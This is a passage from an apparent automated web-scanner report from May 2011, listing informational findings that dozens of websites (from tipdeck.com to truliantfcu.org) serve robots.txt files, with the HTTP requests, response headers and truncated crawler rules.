GET /robots.txt HTTP/1.0
Host: www.tightrope.cc

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:38:00 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "30c-47981c8c-0"
Last-Modified: Thu, 24 Jan 2008 05:05:16 GMT
Content-Type: text/plain
Content-Length: 780

User-agent: Mediapartners-Google*
Disallow:


# Currently disallow all shop stuff to the Google Image bot
# Mainly image hunters anyway, they eat up bandwidth...
User-agent: Googlebot-Image
Disall
...[SNIP]...

27.1616. http://www.tipdeck.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tipdeck.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tipdeck.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:56:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
Last-Modified: Fri, 13 Nov 2009 11:43:52 GMT
Accept-Ranges: bytes
Content-Length: 199
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /*/trackback/$


User-agent: *
Disallow: */trackback/
Disallow: /*/wp-

Disallow: /contact
Disallow: /privacy-policy


Sitemap: http://www.tipdeck.com/sitemap.xml.gz


27.1617. http://www.tire-information-world.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tire-information-world.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tire-information-world.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:14 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.tire-information-world.com/aavq1FxH.xml

User-agent: msnbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: Slurp
Dis
...[SNIP]...

27.1618. http://www.tireteam.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tireteam.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tireteam.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:41 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Fri, 31 Jul 2009 17:34:01 GMT
Accept-Ranges: bytes
Content-Length: 450
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /tmp/
Disallow: /Images/
Disallow: /search/
Disallow: /Resources/
Disallow: /shipping_quote
Disallow: /account_home
Disallow: /account_register
Disallow: /account_reviews
Disal
...[SNIP]...

27.1619. http://www.tna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tna.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 18 Aug 2010 18:55:22 GMT
ETag: "760008-636-48e1d9b90da80"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:06:46 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1620. http://www.tnol.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tnol.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tnol.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:54 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.27
Last-Modified: Sat, 16 Oct 2010 01:36:32 GMT
ETag: "55457-e4-4cb901a0"
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: text/plain

# robots.txt for http://www.tnol.com/
Sitemap: http://www.tnol.com/sitemap1.xml

User-agent: *

Disallow: /email_ad.cfm*
Disallow: /viewImageOffensive.cfm*
Disallow: /saveAd.cfm*
Disallow: /login.cfm*
...[SNIP]...

27.1621. http://www.today24news.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.today24news.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.today24news.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:52 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 04:59:13 GMT
Accept-Ranges: bytes
Content-Length: 180
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 00:51:53 GMT
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /*?*
Allow : /*ftr=vidpgurl

Sitemap: http://today24news.com/sitemap.xml.gz



27.1622. http://www.toenail-fungus.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toenail-fungus.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toenail-fungus.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:14 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 03 Jun 2009 03:46:40 GMT
ETag: "7eec0f9-130-46b6981c8c800"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1623. http://www.topcelebfakes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topcelebfakes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topcelebfakes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:15:34 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.9
Last-Modified: Sat, 30 Oct 2010 19:23:28 GMT
ETag: "13be5bd-1a2-493da82798c00"
Accept-Ranges: bytes
Content-Length: 418
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed
Disallow: /comments
...[SNIP]...

27.1624. http://www.topfamous.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topfamous.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topfamous.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:19:36 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 18 Aug 2010 07:25:57 GMT
ETag: "3c76fe-14e-48e13fa050b40"
Accept-Ranges: bytes
Content-Length: 334

User-agent: *
Disallow: /admin.php
Disallow: /index.php?do=pm
Disallow: /index.php?do=search
Disallow: /index.php?do=register
Disallow: /index.php?do=feedback
Disallow: /index.php?do=lostpassword
Disa
...[SNIP]...

27.1625. http://www.topiccraze.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topiccraze.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topiccraze.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:31 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 13 Jul 2007 02:16:33 GMT
ETag: "1ec0e8-db-b3286240"
Accept-Ranges: bytes
Content-Length: 219
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Mediapartners-Google*
Sitemap: http://www.topiccraze.com/sitemap.xml

Disallow:

User-agent: *
Disallow: /cgi-bin/

# Rover is the spawn of satan <http://www.roverbot.com>
User-agent: Ro
...[SNIP]...

27.1626. http://www.topsofts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topsofts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topsofts.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:09:25 GMT
Content-Type: text/plain
Connection: close
ETag: "BwcSUkrRHCv"
Last-Modified: Sat, 16 Jan 2010 04:33:06 GMT
Content-Length: 27

User-agent: *
Allow: /


27.1627. http://www.totallymoney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totallymoney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.totallymoney.com

Response

HTTP/1.1 200 OK
Content-Length: 1334
Content-Type: text/plain
Last-Modified: Mon, 13 Dec 2010 15:51:43 GMT
Accept-Ranges: bytes
ETag: "b86d82a3dd9acb1:13d0a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:33:35 GMT
Connection: close

User-agent: *
Disallow: /Templates/
Disallow: /landing/
Disallow: /mortgage/
Disallow: /credit-cards/?csrc=220&tbl=badcredit
Disallow: /credit-cards/credit-card-splash.aspx?csrc=20&ccid=82
Disa
...[SNIP]...

27.1628. http://www.tothepc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tothepc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tothepc.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 02:35:14 GMT
Content-Type: text/plain
Content-Length: 487
Last-Modified: Wed, 04 May 2011 00:53:17 GMT
Connection: close
Accept-Ranges: bytes

sitemap: http://www.tothepc.com/sitemap.xml.gz


User-agent: *
Disallow: /comments/feed
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/plugins
Disallow: /wp-co
...[SNIP]...

27.1629. http://www.toxic-black-mold-info.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toxic-black-mold-info.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toxic-black-mold-info.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:00:29 GMT
Server: Apache
Last-Modified: Thu, 12 Feb 2004 13:37:31 GMT
ETag: "3f4b23-20-402b819b"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/

27.1630. http://www.tracking33.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracking33.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tracking33.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:53 GMT
Server: Apache
Last-Modified: Mon, 03 Jan 2011 15:45:23 GMT
ETag: "10c83a7-19-498f30a3baac0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1631. http://www.tractorpart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tractorpart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tractorpart.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:10:48 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 01:54:59 GMT
ETag: "307fc35-d1-4c0ef473"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Crawl-delay: 5
Disallow: /cgi-bin/
Disallow: /private/
Disallow: /cart/
Disallow: /stats/
Disallow: /WildWest Original/
Sitemap: tracto
...[SNIP]...

27.1632. http://www.tradewindsfruit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradewindsfruit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tradewindsfruit.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:05:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 07 Jun 2003 09:12:48 GMT
Accept-Ranges: bytes
Content-Length: 93
Content-Type: text/plain
Age: 0
Server: YTS/1.19.8

User-agent: *
Disallow: /Buttons/
Disallow: /fruitsregion.htm
Disallow: /fruitsregiontop.htm

27.1633. http://www.translatum.gr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.translatum.gr
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.translatum.gr

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Fri, 31 Oct 2008 16:49:19 GMT
ETag: "5960234-1029-45a8f60e0a1c0"
Accept-Ranges: bytes
Content-Length: 4137
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 01:45:33 GMT
Connection: close
Content-Type: text/plain

User-agent: e-SocietyRobot
Disallow: /

# Bad bot - Often ignores robots.txt - Waste of bandwidth
User-agent: Twiceler
Disallow: /

# W3C Bot which checks all links on the page - consumes bandwidth
Us
...[SNIP]...

27.1634. http://www.travelagentcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelagentcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelagentcentral.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 11 Dec 2010 09:43:22 GMT
ETag: "1bd0068-65b-4971f4d35e280"
Accept-Ranges: bytes
Content-Length: 1627
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.1635. http://www.treadwright.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.treadwright.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.treadwright.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 11 Apr 2011 18:24:56 GMT
Accept-Ranges: bytes
ETag: "302151c275f8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:58:42 GMT
Connection: close
Content-Length: 2606

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

27.1636. http://www.treetop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.treetop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.treetop.com

Response

HTTP/1.1 200 OK
Content-Length: 72
Content-Type: text/plain
Last-Modified: Mon, 21 Mar 2011 22:16:45 GMT
Accept-Ranges: bytes
ETag: "6cf64aa15e8cb1:2c52"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:06:50 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /ConsumerSite/
Disallow: /Admin/


27.1637. http://www.trekmovie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trekmovie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trekmovie.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://trekmovie.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8


User-agent: *
Disallow:

27.1638. http://www.treknature.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.treknature.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.treknature.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:48 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Fri, 07 Nov 2008 18:22:49 GMT
ETag: "31f914-1f1-49148779"
Accept-Ranges: bytes
Content-Length: 497
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /rb/
Disallow: /tasks/
Disallow: /viewphotos.php
Disallow: /favorites.php

User-agent: psbot
Disallow: /

User-agent: TurnitinBot
Disallow: /

User-agent: Zao
Disa
...[SNIP]...

27.1639. http://www.tribune.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribune.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tribune.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 115
Content-Type: text/plain
Last-Modified: Tue, 17 Dec 2002 22:58:24 GMT
ETag: "73-3dffac10"
Accept-Ranges: bytes
Date: Wed, 04 May 2011 04:17:25 GMT
Connection: close

User-agent: *
Disallow: /media
Disallow: /images
Disallow: /stylesheets
Disallow: /javascript
Disallow: /event.ng/

27.1640. http://www.tribuneindia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribuneindia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tribuneindia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:30 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2000 05:15:03 GMT
ETag: "d2c419-8b-988783c0"
Accept-Ranges: bytes
Content-Length: 139
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /*tribune.htm
Disallow: /*suggest.htm
Disallow: /*health.htm
Disallow: /*/*/health.htm
Disallow: /*archive.htm

27.1641. http://www.tricklife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tricklife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tricklife.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:13 GMT
Server: Apache/1.3.41 (Unix) mod_evasive/2.1 PHP/5.2.13
Last-Modified: Fri, 27 Jun 2008 13:40:37 GMT
ETag: "2e-4864edd5"
Accept-Ranges: bytes
Content-Length: 46
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/memberlist.php

27.1642. http://www.trifuel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trifuel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trifuel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:25 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Last-Modified: Mon, 28 May 2007 01:11:08 GMT
ETag: "22d05e-8d-465a2c2c"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/plain

User-agent: Slurp
Disallow: /forums

User-agent: *
Disallow: /images
Disallow: /admin
Disallow: /graphics
Disallow: /themes
Disallow: /manual

27.1643. http://www.tristateobits.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tristateobits.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tristateobits.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:55 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 14:20:31 GMT
ETag: "56895a-11f-b80dc9c0"
Accept-Ranges: bytes
Content-Length: 287
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# mail services@atlas.cc for constructive criticism

User-agent: *
Disallow: /admin
Disallow: /calendar
Disallow: /cgi-bin
Disallow: /db
Disallow: /flexigrid
Disallow: /images
Disallow: /incl
...[SNIP]...

27.1644. http://www.triumphrat.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.triumphrat.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.triumphrat.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:01 GMT
Server: Apache
Last-Modified: Tue, 15 Apr 2008 18:17:24 GMT
Accept-Ranges: bytes
Content-Length: 44
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

27.1645. http://www.trivia-library.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trivia-library.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trivia-library.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:34:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b PHP/5.2.6
Last-Modified: Fri, 05 Dec 2008 20:45:43 GMT
ETag: "1ff016-1c-45d52c2c16bc0"
Accept-Ranges: bytes
Content-Length: 28
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /inc

27.1646. http://www.tropicalpermaculture.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tropicalpermaculture.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tropicalpermaculture.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:05 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.tropicalpermaculture.com/9egXkZ2Z.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow:
...[SNIP]...

27.1647. http://www.troplv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.troplv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.troplv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:45 GMT
Server: Apache/2.2.17 (Fedora)
Last-Modified: Mon, 04 Apr 2011 16:12:47 GMT
ETag: "624859-106-4a01a07d2252d"
Accept-Ranges: bytes
Content-Length: 262
Cache-Control: max-age=86400
Expires: Thu, 05 May 2011 02:24:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-content/
Disallow: /wp-includes/
Disallow: /wp-admin/
Disallow: /blog/wp-content/
Disallow: /blog/wp-includes/
Disallow: /blog/wp-admin/


User-Agent: MJ12bot
           
...[SNIP]...

27.1648. http://www.truckchamp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truckchamp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truckchamp.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:15:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 15 Jul 2010 21:57:36 GMT
ETag: "9e0024-110-48b7430adb400"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin
Disallow: /cart.php
Disallow: /cart
Disallow: /checkout.php
Disallow: /finalizeoffer.php
Disallow: /account
Disallow: /giftcertificates
Disallow: /defectreport

...[SNIP]...

27.1649. http://www.truckntrailer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truckntrailer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truckntrailer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 15 Aug 2009 05:51:39 GMT
ETag: "9cc121-17f-47127c32cd0c0"
Accept-Ranges: bytes
Content-Length: 383
Connection: close
Content-Type: text/plain

# robots.txt
User-agent: *
Disallow: /cgi-bin/
Disallow: /icon/
Disallow: /inc/activex/
Disallow: /inc/pl/
Disallow: /inc/js/
Disallow: /TNTclient/
Disallow: /TNTadmin/
Disallow: /redir.cgi*
Disallow
...[SNIP]...

27.1650. http://www.trueportraits.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trueportraits.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trueportraits.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:44 GMT
Server: Apache
Last-Modified: Sun, 10 Oct 2010 02:02:25 GMT
ETag: "f1de28-2c-4cb11eb1"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:


27.1651. http://www.trueresults.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trueresults.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trueresults.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:02:17 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 20 Dec 2010 23:30:34 GMT
ETag: "80bd-74d-497dfe8147a80"
Accept-Ranges: bytes
Content-Length: 1869
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1652. http://www.trueswords.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trueswords.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trueswords.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:10 GMT
Server: Apache/2
Last-Modified: Wed, 23 Apr 2008 09:12:29 GMT
ETag: "19d0635-24-44b86bb6c9940"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

27.1653. http://www.truewoman.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truewoman.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:09:42 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 24 Jul 2008 16:34:28 GMT
ETag: "1dd010-3b-452c7a17aed00"
Accept-Ranges: bytes
Content-Length: 59
Vary: Accept-Encoding

# Robots.txt file
User-agent: *
Disallow: /index.php?id=99

27.1654. http://www.truliantfcu.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truliantfcu.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truliantfcu.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:12 GMT
Server: Apache
Last-Modified: Fri, 14 Nov 2008 15:44:31 GMT
